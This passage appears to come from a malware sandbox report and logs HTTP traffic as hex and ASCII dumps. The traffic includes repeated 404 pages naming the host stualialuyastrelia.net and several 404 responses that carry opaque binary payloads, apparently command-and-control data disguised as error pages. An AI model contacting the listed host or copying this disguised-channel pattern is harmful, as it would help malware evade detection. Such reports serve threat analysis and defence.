b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 65 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1b 81 01 c7 5b cb f7 07 a6 3b bf 29 46 16 31 e4 76 4b 6d 82 5c 2c 13 37 c1 a5 94 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eUys/~(`:[;)F1vKm\,70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 39 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 19 c1 5d de fa 09 b4 20 fd 26 4c 17 34 ff 6b 4b 36 d4 00 2a 5f 2e d3 af 87 ed 8d 73 95 64 7e 0b 69 e3 b4 e8 fa 58 6e 96 77 7b b8 da 85 39 bf 06 26 fb 43 9d 0d 0a 30 0d 0a 0d 0a Data Ascii: 49Uys/~(u:R] &L4kK6*_.sd~iXnw{9&C0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 87 14 d0 59 9c fe 09 b7 3a e5 3f 57 5b 38 be 65 0b 69 c3 57 3b 0f 7c c3 e2 90 a9 d6 71 8a 63 32 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35Uys/~(`:Y:?W[8eiW;\|qc2]0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 5e c3 66 59 c1 d5 0f f5 91 2e c3 29 02 f2 00 b2 90 40 21 e9 3c 1f 09 21 24 db 82 08 f2 f4 c0 10 ff 37 b6 2c da 90 b7 75 eb 02 cf 88 f0 96 0d d7 e7 7f 8c 40 a3 fa db eb 10 27 2e 08 7b 1c b0 d0 cb 00 55 13 33 8a a6 a5 06 02 a8 23 90 de 23 bf 6c 13 d9 c8 e7 9f b9 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cd 00 79 90 b8 76 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 77 f9 ff 78 4d 57 db c4 0d 13 13 a5 3f e1 92 24 18 4f c5 03 f1 c5 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 aa e3 96 be 21 51 61 ca d1 2f 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 2b 87 ea 0e f4 eb 7e 71 eb 90 fa 1a 80 9c 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 47 43 32 27 cc 69 b7 9f 93 bb c2 46 99 48 15 ac af eb d9 55 3d af ba 68 92 5e f1 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 07 5a d1 8e 82 11 e8 e4 1f 6c af 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 e4 2a 85 1f d4 0c 66 91 9c 11 06 f1 2c 68 a0 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 d0 e1 8b 8b e1 f2 74 d7 9c ac c3 e0 2b c7 ba bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a4 b5 44 00 80 e3 1c 68 21 f5 52 48 34 34 96 4d c9 e7 17 3f 4e eb 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee b1 e5 bb 8b 54 f3 c3 a7 4c aa ca d4 5f 29 4c 43 9c 51 03 62 18 ae 13 f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 ef e5 90 7a 9a e8 23 1e ac f0 2f 70 b3 0e 83 8e 19 13 80 bb 8c f5 80 99 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 cd 43 d9 ad 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:12:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 22 Dec 2023 20:14:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-137.ec2.internalX-Request-Id: 3c744ec0-7d37-45f1-9715-6f2f8f433e61Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
